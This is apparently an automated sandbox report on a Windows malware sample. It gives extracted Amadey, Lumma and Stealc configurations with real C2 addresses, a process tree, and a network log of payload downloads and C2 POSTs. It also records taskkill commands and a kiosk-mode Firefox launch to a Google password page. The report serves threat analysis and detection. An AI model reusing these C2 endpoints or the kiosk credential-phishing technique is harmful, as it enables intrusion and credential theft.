Analysis

  • max time kernel
    144s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    07-12-2024 02:44

General

  • Target

    553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe

  • Size

    1.8MB

  • MD5

    a93b02d857db3b12c32bd765b83825ab

  • SHA1

    137f12047a081e6581e1d1a83c939d98514c3ff3

  • SHA256

    553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa

  • SHA512

    aab2bfd4090c77b87784d0110f5ee2dd24554fada9bdf9c2e8e08ff01a9025f5d8a7dfa2d4b89bf35cb037c162292a04f1084b87727b1bd201a9b5ab1b367bcd

  • SSDEEP

    49152:3jRwzOUOxqpHXV7ehRYo/cpkFt80BZ2QV7aGyC:3j+pOkJXV7Nqckm

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 5 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 8 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe
    "C:\Users\Admin\AppData\Local\Temp\553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe
        "C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:852
      • C:\Users\Admin\AppData\Local\Temp\1012852001\165fa3ed5f.exe
        "C:\Users\Admin\AppData\Local\Temp\1012852001\165fa3ed5f.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2980
      • C:\Users\Admin\AppData\Local\Temp\1012853001\a3af4d3bce.exe
        "C:\Users\Admin\AppData\Local\Temp\1012853001\a3af4d3bce.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1744
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2000
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:532
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2140
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:764
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1484
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2100
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            5⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2128
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.0.1430177469\1492140918" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {40084d1b-1917-43f4-9288-b39eae22dad7} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1308 fed6158 gpu
              6⤵
              PID:2564
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.1.1813241620\1207456748" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5acca9fb-cd7c-4d13-9e86-2a6e622e4aea} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1496 edeb258 socket
              6⤵
              PID:2440
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.2.803376644\835238809" -childID 1 -isForBrowser -prefsHandle 2060 -prefMapHandle 2056 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {458d177d-038d-494e-887c-a9f6c44aba4a} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2072 184c7058 tab
              6⤵
              PID:1036
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.3.530846057\1271207579" -childID 2 -isForBrowser -prefsHandle 2808 -prefMapHandle 2804 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd75f913-9ac5-4a1e-9cf1-402da143d74a} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2820 1bf08558 tab
              6⤵
              PID:2300
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.4.265144092\861899394" -childID 3 -isForBrowser -prefsHandle 3632 -prefMapHandle 3652 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8924fde-2a19-485e-8580-b0fbf2b4397f} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3504 1eb46258 tab
              6⤵
              PID:1680
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.5.1000239758\466541562" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3804 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe3deabe-3fa1-4efe-9119-4a14e5ea18fb} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3788 1f3ed358 tab
              6⤵
              PID:2704
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.6.1653761712\1610857076" -childID 5 -isForBrowser -prefsHandle 3876 -prefMapHandle 3660 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f22db11-68f9-48b2-b7e8-b2cdd15c9d5e} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3916 1f3ee858 tab
              6⤵
              PID:2576
      • C:\Users\Admin\AppData\Local\Temp\1012854001\27c0ef76e8.exe
        "C:\Users\Admin\AppData\Local\Temp\1012854001\27c0ef76e8.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Windows security modification
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3016

Network

                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 156
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  GET
                  http://185.215.113.16/luma/random.exe
                  skotes.exe
                  Remote address:
                  185.215.113.16:80
                  Request
                  GET /luma/random.exe HTTP/1.1
                  Host: 185.215.113.16
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:54 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 1830400
                  Last-Modified: Sat, 07 Dec 2024 02:16:12 GMT
                  Connection: keep-alive
                  ETag: "6753afec-1bee00"
                  Accept-Ranges: bytes
                • flag-ru
                  GET
                  http://185.215.113.16/steam/random.exe
                  skotes.exe
                  Remote address:
                  185.215.113.16:80
                  Request
                  GET /steam/random.exe HTTP/1.1
                  Host: 185.215.113.16
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 5173248
                  Last-Modified: Sat, 07 Dec 2024 02:16:21 GMT
                  Connection: keep-alive
                  ETag: "6753aff5-4ef000"
                  Accept-Ranges: bytes
                • flag-ru
                  GET
                  http://185.215.113.16/well/random.exe
                  skotes.exe
                  Remote address:
                  185.215.113.16:80
                  Request
                  GET /well/random.exe HTTP/1.1
                  Host: 185.215.113.16
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:06 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 971264
                  Last-Modified: Sat, 07 Dec 2024 02:14:24 GMT
                  Connection: keep-alive
                  ETag: "6753af80-ed200"
                  Accept-Ranges: bytes
                • flag-ru
                  GET
                  http://185.215.113.16/off/random.exe
                  skotes.exe
                  Remote address:
                  185.215.113.16:80
                  Request
                  GET /off/random.exe HTTP/1.1
                  Host: 185.215.113.16
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:10 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2766336
                  Last-Modified: Sat, 07 Dec 2024 02:14:50 GMT
                  Connection: keep-alive
                  ETag: "6753af9a-2a3600"
                  Accept-Ranges: bytes
                • flag-us
                  DNS
                  atten-supporse.biz
                  d1eb0cd776.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  atten-supporse.biz
                  IN A
                  Response
                  atten-supporse.biz
                  IN A
                  104.21.16.9
                  atten-supporse.biz
                  IN A
                  172.67.165.166
                • flag-us
                  POST
                  https://atten-supporse.biz/api
                  d1eb0cd776.exe
                  Remote address:
                  104.21.16.9:443
                  Request
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: atten-supporse.biz
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: PHPSESSID=818nekq9tromapg55ognkmvp1m; expires=Tue, 01-Apr-2025 20:31:36 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  cf-cache-status: DYNAMIC
                  vary: accept-encoding
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmB2wHyeXmsnZ1romxLQMt4Wz1ymSdqVhPFQY6GVX7RWC3EbZ7c1al2bJbD4ZA9UFS5r9GduDWoYTrMwSbKT3Of3re284aNonUxDazIFTFTmOoI5WCEvC1sYin45kFaGUVFxaKk%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8ee12d416cb6cd22-LHR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=32189&min_rtt=26250&rtt_var=17042&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=130669&cwnd=242&unsent_bytes=0&cid=02f989390392c673&ts=325&x=0"
                • flag-us
                  DNS
                  se-blurry.biz
                  d1eb0cd776.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  se-blurry.biz
                  IN A
                  Response
                  se-blurry.biz
                  IN A
                  172.67.162.65
                  se-blurry.biz
                  IN A
                  104.21.81.153
                • flag-us
                  POST
                  https://se-blurry.biz/api
                  d1eb0cd776.exe
                  Remote address:
                  172.67.162.65:443
                  Request
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: se-blurry.biz
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: PHPSESSID=kmltkhneqv2e17ahnjbfre8p2m; expires=Tue, 01-Apr-2025 20:31:36 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  cf-cache-status: DYNAMIC
                  vary: accept-encoding
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBRdLQqQSDJAlPFPKFclw3XL6KXS7A9OIzLWatZzMef5woeqzFgPcANHIOmRDL3nj8ClcsnCmaTDYbeSHB6yi7C6Z3RQSvQtpSRqg%2BAKEM8iApHttcPskEAP%2BG5sRhBI"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8ee12d43caad48b9-LHR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=27330&min_rtt=25758&rtt_var=8277&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=581&delivery_rate=134431&cwnd=253&unsent_bytes=0&cid=d323d40f3982bf5f&ts=231&x=0"
                • flag-us
                  DNS
                  zinc-sneark.biz
                  d1eb0cd776.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  zinc-sneark.biz
                  IN A
                  Response
                  zinc-sneark.biz
                  IN A
                  172.67.136.167
                  zinc-sneark.biz
                  IN A
                  104.21.62.142
                • flag-us
                  POST
                  https://zinc-sneark.biz/api
                  d1eb0cd776.exe
                  Remote address:
                  172.67.136.167:443
                  Request
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: zinc-sneark.biz
                  Response
                  HTTP/1.1 403 Forbidden
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Frame-Options: SAMEORIGIN
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inEuN20ha1ELB9jct%2BaMlWIAz6QkGeJZTP5pUrTefpGVnq91IJh%2BPoKR2O%2BJlE9OjGowL4rcYXpozbX1j70WUHrWv8rC%2BaX%2FTRgHN4ARpo2DQI3a6HS%2FjCAjsvCcgvJd4vo%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8ee12d464d40ed0b-LHR
                • flag-us
                  POST
                  https://zinc-sneark.biz/api
                  d1eb0cd776.exe
                  Remote address:
                  172.67.136.167:443
                  Request
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Cookie: __cf_mw_byp=qNIp90r.SHEYd_qmd_KFOgLmKOCHrYk2Bq1ZNwN6MgY-1733539497-0.0.1.1-/api
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 53
                  Host: zinc-sneark.biz
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:44:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: PHPSESSID=fomo9eenelmm8fnrnbp8g375qt; expires=Tue, 01-Apr-2025 20:31:37 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  cf-cache-status: DYNAMIC
                  vary: accept-encoding
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVG8hh10C4NXOm3Jk4bH3E%2BPfc9eUtCkZRWkb8QIwv1H%2Bnsq8ztyqs1NbYBIiUirGXwmfmOHjG8uzrP3AFH3Z%2FLyk6WxmhI%2BQRpNRQUKYfWdLdwZZSfXo1beOdGRG7kPYu0%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8ee12d48b8d0ed0b-LHR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=33308&min_rtt=28239&rtt_var=7219&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8127&recv_bytes=1057&delivery_rate=286538&cwnd=257&unsent_bytes=0&cid=786a4ddf764d5cb4&ts=656&x=0"
                • flag-ru
                  GET
                  http://185.215.113.206/
                  165fa3ed5f.exe
                  Remote address:
                  185.215.113.206:80
                  Request
                  GET / HTTP/1.1
                  Host: 185.215.113.206
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:45:07 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                • flag-ru
                  POST
                  http://185.215.113.206/c4becf79229cb002.php
                  165fa3ed5f.exe
                  Remote address:
                  185.215.113.206:80
                  Request
                  POST /c4becf79229cb002.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----BGHCGCAEBFIJKFIDBGHD
                  Host: 185.215.113.206
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:45:07 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                • flag-us
                  DNS
                  youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube.com
                  IN A
                  Response
                  youtube.com
                  IN A
                  216.58.213.14
                • flag-us
                  DNS
                  spocs.getpocket.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  spocs.getpocket.com
                  IN A
                  Response
                  spocs.getpocket.com
                  IN CNAME
                  prod.ads.prod.webservices.mozgcp.net
                  prod.ads.prod.webservices.mozgcp.net
                  IN A
                  34.117.188.166
                • flag-us
                  DNS
                  getpocket.cdn.mozilla.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  getpocket.cdn.mozilla.net
                  IN A
                  Response
                  getpocket.cdn.mozilla.net
                  IN CNAME
                  getpocket-cdn.prod.mozaws.net
                  getpocket-cdn.prod.mozaws.net
                  IN CNAME
                  prod.pocket.prod.cloudops.mozgcp.net
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN A
                  34.120.5.221
                • flag-gb
                  GET
                  https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                  firefox.exe
                  Remote address:
                  216.58.213.14:443
                  Request
                  GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                  host: youtube.com
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  upgrade-insecure-requests: 1
                  sec-fetch-dest: document
                  sec-fetch-mode: navigate
                  sec-fetch-site: none
                  sec-fetch-user: ?1
                  te: trailers
                • flag-us
                  DNS
                  youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube.com
                  IN A
                  Response
                  youtube.com
                  IN A
                  216.58.213.14
                • flag-us
                  GET
                  https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                  firefox.exe
                  Remote address:
                  34.120.5.221:443
                  Request
                  GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                  host: getpocket.cdn.mozilla.net
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: */*
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  sec-fetch-dest: empty
                  sec-fetch-mode: cors
                  sec-fetch-site: cross-site
